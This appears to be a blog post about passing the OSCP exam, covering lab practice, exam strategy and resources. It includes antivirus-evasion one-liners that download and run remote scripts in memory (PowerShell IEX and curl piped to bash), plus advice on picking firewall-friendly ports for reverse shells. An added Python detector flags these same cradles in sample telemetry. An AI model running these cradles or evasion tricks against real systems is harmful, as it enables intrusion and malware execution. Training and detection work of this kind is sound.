OSCP Experience — How I Earned 100 Points in 10 Hours

Jeremyah Joel
10 min read · Oct 2, 2021

Hi everyone, today I'm going to tell you the story of how I rooted all five machines in my OSCP exam and earned 100 points in just 10 hours! I hope you can find something here that might be useful for you on your journey!

It wasn't easy, but it wasn't hard either. The only right word to describe the journey is "exciting". For context, I am a Computer Science graduate with a Cyber Security major, and I have been involved in cyber defence technology research for two years.

I have a very good understanding of Python, C, and bash. These three played a major part in the success of my blue-team thesis on using machine learning to create a fully autonomous web application firewall. If you're interested in one of our research papers about remote code execution, you can read it here

The Background

1 July 2021 was the start of the journey. My company enrolled me in a 60-day PWK course starting from 11 July 2021. In my case, they cleared my schedule to the point where it felt like paid leave 😂😂. The only thing I needed to do was hack, hack and hack!

For the first ten days, while waiting for the PWK labs, I decided to practise in the Hack The Box lab. I followed TJnull's OSCP-like box list and only did the Linux boxes. My plan was to familiarise myself with Linux exploitation before the PWK lab started; then I could focus on Windows exploitation and buffer overflow later.

The Methodology

I know about "Try Harder", but I couldn't click with this methodology while in the learning phase. I mean, you don't know what you don't know. When you are stuck with an exploit and don't know how to get things to work, there are two things you can do:

  1. You keep trying the same exploit over and over again with an angry face and revert the machine over and over again, smashing your keyboard in the process :)
  2. You reach out to the community/forum/IppSec video or the official writeup to understand how the exploit works, why the service is exploitable, how the exploit takes place, and you understand the flow.

I solved all of the PWK labs and TJnull's list of boxes, and I realised that sometimes we need to use a specific exploit for which there are very limited resources, even on Google. You need help, at least a sanity check, or a good keyword to keep you on the right track.

My methodology is simple: when I encounter a new service that I'm not familiar with and have already spent too much time trying to get the exploit to work without any success, I visit the forum without hesitation or guilt. Then I make sure that I take good notes, so that if I encounter the same service in the future, I can easily apply what I learned. Pivoting and tunnelling can be tricky too! Remember that "You learn something new every day."

The PWK Lab

The Start

This might have been the most exciting moment in my life. It felt like heaven when I could finally let my curiosity loose on 75 different live targets. As I said before, I had already done TJnull's boxes, and the lab is surprisingly similar to those boxes. The only noticeable difference is that the HTB boxes have a CTF-like touch, while the PWK lab feels like a straightforward real-life scenario.

In my first week, I rooted 29 boxes🔥🔥. In the second week, I added another 23, for 52 boxes in two weeks🔥🔥. My priority was to attack the Active Directory and dependent machines and skip the hard machines. Slowly but surely, I could feel the fire inside me was about to go out.

The Burnout

At this point, it felt almost impossible to keep going. I was stuck between two opposite feelings. First, I felt like I was repeating the same things over and over again. Second, it felt like the remaining boxes were very hard and almost impossible to solve.

To deal with this, I decided to take a week-long vacation. I went out with my family, played Dota with my friends, and stayed up all night playing Cyberpunk (with a netrunner / hacker build, for sure!) for the whole week. Whenever I felt guilty, I would watch IppSec videos and keep my notes going.

If you are in this period, you just need to keep asking yourself to move forward.

How bad do you want it?

The burnout period

The Comeback

In my fourth week, I'd had enough of playing and it was time to come back to the grind. While doing the ex-exam machines in one of the departments, I had trouble understanding static binaries and pivoting. Luckily for me, I found a friend on the OffSec community Discord who taught me the right way to pivot and the power of the Nishang reverse shell.

The buffer overflow was a bit hard for me. Luckily, OffSec provides a very clear video explaining how the exploit occurs step by step, so I understood the whole flow of the exploit. After reproducing the Win32 BOF exercises, the BOF machine in the lab was too easy.

In the first month of my lab time, I completely pwned all the boxes in the PWK lab! I was very happy but also worried about Windows privilege escalation, as I am not too familiar with the Windows environment (I am a Mac user).

The Waiting

After doing all the boxes, I didn't touch the lab anymore. Every day for the next two weeks, I just played Dota and watched IppSec videos. Every time I learned something new, I added it to my notes.

In this period, I found https://ippsec.rocks/, which was very useful in my exam. I booked the exam for 6 September and later rescheduled it to 3 September.

The Important Points in PWK Lab

If you want a good exam experience, I strongly suggest considering everything on this list:

  1. Make sure you solve the big four boxes in the lab without any help. No need to rush. Just do these boxes whenever you feel ready. They will give you lots of new knowledge.
  2. Make sure you root every retired exam box. You will know one when you see it. These boxes are very different from the lab boxes. You will understand why, and it will tell you what to expect in the real exam.
  3. Make sure you master your tools. What did you choose? nmapAutomator? AutoRecon? Manual Nmap? Make sure you are familiar with their output. Try your tools on the retired exam boxes.
  4. Make sure you master your reverse shells and understand how to choose the right port. The exam machines are very tricky and sensitive to inbound/outbound port rules. Test your methodology on the retired exam boxes.
  5. For what it's worth, please don't focus only on your public department, as it will only give you the basic skills you need. Break into another department, learn how to pivot, and have fun with the real boxes!

The OSCP Exam

My exam started at 10.00 AM. I woke up at around 9.30 AM and was surprised when I went to my Discord channel and saw that all my friends were waiting for me. I have three best friends there. One is an IT GRC officer, one is a risk consultant, and one is a colleague. They sent me coffee, gave me motivation, and were always there for the next 10 hours. Whenever I took a break, I would join the Discord channel and talk about how we were going to play Dota and Age of Empires III hard after I passed my exam🙃🙃

This was the first time that someone in my class had taken the OSCP exam, and everyone was very excited even though they are not into offensive security at all 🙃🙃

Fifteen minutes before the exam started, I left the Discord channels and proceeded to the verification process. Everything went well, and I got my VPN access at exactly 10.00 AM.

The Strategy

The plan was simple.

  1. Win32 Buffer Overflow (25 Points)
  2. Easy Box (10 Points)
  3. Medium Box (20 Points)
  4. Medium Box (20 Points) — Safe Point
  5. Hard Box (25 Points)

I used nmapAutomator on the 25-point box to save time. Then I started on my plan.

The Unexpected

Well, the unexpected went two ways. The first was "Wow, this is too easy" and the second was "What the hell is this?". The first was the buffer overflow. After spending around a week learning the buffer overflow methodology, it was a relief to solve the buffer overflow box in just 30 minutes.

I took a 30-minute break after finishing the buffer overflow while waiting for Nmap to run. I ordered Gojek to deliver some coffee, Shilin, candy, and lunch. I was very excited!!

Next were the 10-point and 20-point boxes. These two boxes taught me about the "Expect the Unexpected" and "Try Harder" methodology 🙃🙃 I kept making small mistakes by underestimating an exploit and choosing random ports without any reason. After I applied what I had learned from the retired exam boxes in the lab, I completed these boxes in just two hours.

The boxes were relatively easy but needed lots of effort. Debugging, fixing, and downloading the services I'm not very familiar with to understand them better is the way to understand the flow and the flaw.

I took a one-hour break to go out with my little sister and pick up some ice cream at McD. Don't forget to relax; you're free to take as many breaks as you want as long as you ask the proctor politely. Then I started my next box.

I have two mottos to keep me in line with the exploit and sanity-check my progress. If it's too hard, I ask myself, "OSCP is a foundation course; would it really go this far?" And if it looks too straightforward and the exploit didn't work, I ask myself, "If it is this easy, why is the OSCP pass rate so low? There must be another way."

The next two boxes were relatively exciting. As far as I remember, I didn't use any public exploit to gain a shell at all! Purely chaining misconfigurations and taking advantage of open services! These boxes were very fun and represented a real-life scenario. In around two and a half hours, I managed to get root on the 20-point box and a low-level shell on the 25-point box. I already had 87.5 points in my pocket and felt safe.

I decided to take another one-hour break, and I contacted my colleagues to let them know that I had four roots and one low-level shell. They were very excited and congratulated me. My friends on Discord were very happy, and they sent me some food. I used this time to take a bath and relax.

The last privilege escalation took me two hours in total. It was very exciting to finally use my web exploitation skills in this advanced, CTF-like case. By chaining some vulnerabilities and services, I managed to get a Windows admin account from remote code execution, still in the form of a web shell. I jumped out of my brand-new secret lab chair. My dad was next to me and hugged me when I said, "I got 100 points". I then chatted with the proctor to say, "Heyy, just want to let you know I got 100 points :) I am very happy". As expected, he didn't care and replied, "Keep up the good work" 🙃🙃.

Even though it was a non-interactive shell, I had mastered Nishang as my secret weapon and knew how to upgrade this shell to a fully interactive one. So I decided to take another short 15-minute break to let my friends and colleagues know that I got 100 points! I WAS VERY HAPPY!

After the break, I upgraded the web shell to a proper reverse shell, and it was very easy because I had already used Nishang on all my Windows boxes. In exactly 10 hours, I rooted five machines and got 100 points! It took me another hour to reproduce all the exploits and take screenshots for the report. I stopped my exam afterwards.

I played Dota all night and started the report the next day. Around 7 hours after my submission, I got an email from the Offensive Security team that I had passed my OSCP exam!

My Gift

These are the resources that helped me a lot in my lab and exam.

Resources:

  1. Got an RCE on a Windows-based system? Nishang Windows reverse shell
  2. Already got a low-level shell? LinPEAS/WinPEAS to enumerate and pspy to guess the cron job.
  3. Don't know how to exploit specific services? ippsec.rocks
  4. Don't know about common website and service exploits? HackTricks
  5. No service is exploitable? Try a kernel exploit: Linux Exploit Suggester 2 and Metasploit's Local Exploit Suggester for Windows.

Antivirus Evasion Technique

In the lab and exam, you will encounter many machines with built-in antivirus. The files will be removed from the server instantly when you try to download a reverse shell/backdoor payload like Nishang or an msfvenom-generated payload. You can take advantage of in-memory download and execute as shown below.

For Windows, you can use:

powershell iex (New-Object Net.WebClient).DownloadString('url')

And for Linux, you can take advantage of command chaining, in this case a pipe, to feed the raw file directly to bash:

curl URL | bash

Port Choosing Technique

Make sure you understand how to determine which port to use. If you force a Windows server to download files from a random port, the firewall will block it. Aim for common misconfigurations that can be taken advantage of. For example, if you want to transfer a file, make sure to host it on port 80 or 443. And if you want to make a reverse connection, try port 22. If no port is working, try port reuse by killing the application from the low-level shell.
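Looking at the same two techniques from the blue-team side, here is an added example (not part of the original post, and not the author's code) of what the in-memory download cradles above and the "use an allowed egress port" trick look like in endpoint telemetry. It scans a handful of constructed Sysmon-style events (EventID 1 process creation, EventID 3 network connection; the field names follow Sysmon's schema, the hosts, paths and command lines are made up for this example) and flags the PowerShell IEX/DownloadString cradle, `curl ... | bash`, a web-server worker spawning a shell interpreter, and outbound connections on 22/80/443 from processes that have no business making them. The process-name lists are assumptions a defender would tune to their own environment.

```python
"""Detection-side companion to the AV-evasion and port-choosing notes above.

Added example: scans constructed Sysmon-style events for in-memory download
cradles and for suspicious egress on the "allowed" ports 22/80/443.
"""
import re
from typing import Dict, List

Event = Dict[str, object]
Finding = Dict[str, str]

# Command-line patterns for in-memory download-and-execute cradles.
CRADLE_PATTERNS = {
    # IEX / Invoke-Expression combined with a WebClient download in one command line
    "ps_download_cradle": re.compile(
        r"(?i)(?=.*\b(iex|invoke-expression)\b)(?=.*(downloadstring|downloadfile|net\.webclient))"
    ),
    # curl/wget output piped straight into a shell interpreter
    "pipe_to_shell": re.compile(r"(?i)\b(curl|wget)\b[^|]*\|\s*(ba|z|da)?sh\b"),
}

# Assumed environment knowledge: processes that serve requests and should not
# spawn shells or open outbound connections themselves (tune per estate).
SERVER_WORKERS = {"w3wp.exe", "httpd", "apache2", "nginx", "php-fpm", "tomcat.exe"}
SHELL_INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "sh", "bash", "dash", "python", "python3", "perl"}
SSH_CLIENTS = {"ssh", "ssh.exe", "scp", "sftp", "plink.exe", "putty.exe"}
EGRESS_PORTS = {22, 80, 443}


def basename(path: object) -> str:
    """Last path component, lower-cased, for both Windows and POSIX paths."""
    return re.split(r"[\\/]", str(path))[-1].lower()


def check_process_create(ev: Event) -> List[Finding]:
    findings: List[Finding] = []
    cmd = str(ev.get("CommandLine", ""))
    child = basename(ev.get("Image", ""))
    parent = basename(ev.get("ParentImage", ""))
    for rule, pattern in CRADLE_PATTERNS.items():
        if pattern.search(cmd):
            findings.append({"rule": rule, "severity": "high", "image": child, "detail": cmd[:80]})
    # A request-serving worker launching an interpreter is the classic web-shell footprint.
    if parent in SERVER_WORKERS and child in SHELL_INTERPRETERS:
        findings.append({"rule": "server_worker_spawned_shell", "severity": "high",
                         "image": child, "detail": f"parent={parent}"})
    return findings


def check_network_connect(ev: Event) -> List[Finding]:
    if not ev.get("Initiated", False):          # only outbound connections matter here
        return []
    port = int(ev.get("DestinationPort", 0))
    image = basename(ev.get("Image", ""))
    dest = f"{ev.get('DestinationIp', '?')}:{port}"
    if image in SERVER_WORKERS and port in EGRESS_PORTS:
        return [{"rule": "server_worker_egress", "severity": "high", "image": image, "detail": dest}]
    if port == 22 and image not in SSH_CLIENTS:
        # Reverse shells on 22 hide among SSH traffic; a non-SSH client is the tell.
        return [{"rule": "non_ssh_client_to_22", "severity": "medium", "image": image, "detail": dest}]
    return []


def scan(events: List[Event]) -> List[Finding]:
    findings: List[Finding] = []
    for ev in events:
        if ev.get("EventID") == 1:
            findings.extend(check_process_create(ev))
        elif ev.get("EventID") == 3:
            findings.extend(check_network_connect(ev))
    return findings


# Constructed sample telemetry (203.0.113.0/24 is a documentation range).
SAMPLE_EVENTS: List[Event] = [
    {"EventID": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "CommandLine": "powershell iex (New-Object Net.WebClient).DownloadString('http://203.0.113.10/s.ps1')"},
    {"EventID": 1, "Image": "/bin/sh", "ParentImage": "/usr/sbin/apache2",
     "CommandLine": '/bin/sh -c "curl http://203.0.113.10/x.sh | bash"'},
    {"EventID": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\taskeng.exe",
     "CommandLine": r"powershell.exe -File C:\scripts\backup.ps1"},          # benign scheduled task
    {"EventID": 3, "Image": r"C:\Windows\System32\inetsrv\w3wp.exe", "Initiated": True,
     "DestinationIp": "203.0.113.10", "DestinationPort": 443},
    {"EventID": 3, "Image": r"C:\Windows\System32\cmd.exe", "Initiated": True,
     "DestinationIp": "203.0.113.10", "DestinationPort": 22},
    {"EventID": 3, "Image": r"C:\Windows\System32\OpenSSH\ssh.exe", "Initiated": True,
     "DestinationIp": "203.0.113.20", "DestinationPort": 22},                  # benign SSH session
    {"EventID": 3, "Image": r"C:\Program Files\Google\Chrome\Application\chrome.exe", "Initiated": True,
     "DestinationIp": "203.0.113.30", "DestinationPort": 443},                 # benign browsing
]

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"[{f['severity']}] {f['rule']}: {f['image']} ({f['detail']})")
```

Run against the constructed events the scanner reports six findings: two for each of the two cradle command lines (the cradle itself plus the worker-spawned-shell relationship), one for the web worker reaching out on 443, and one for cmd.exe connecting to port 22; the scheduled-task PowerShell, the real SSH client and the browser are not flagged. The port-22 rule is deliberately "medium": it only narrows the haystack, which is exactly why the post's advice works from the attacker's chair.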

I will update this section when I remember another resource I used.

Special Thanks

I am forever thankful to be part of the Vantage Point Security team. All my colleagues are very humble and supportive. I am thankful for my supportive family and friends as well.

Thanks to my friends for the constant support and time invested in me.


Jeremyah Joel

Product Security at Ministry of Education, Culture, Research, and Technology of Indonesia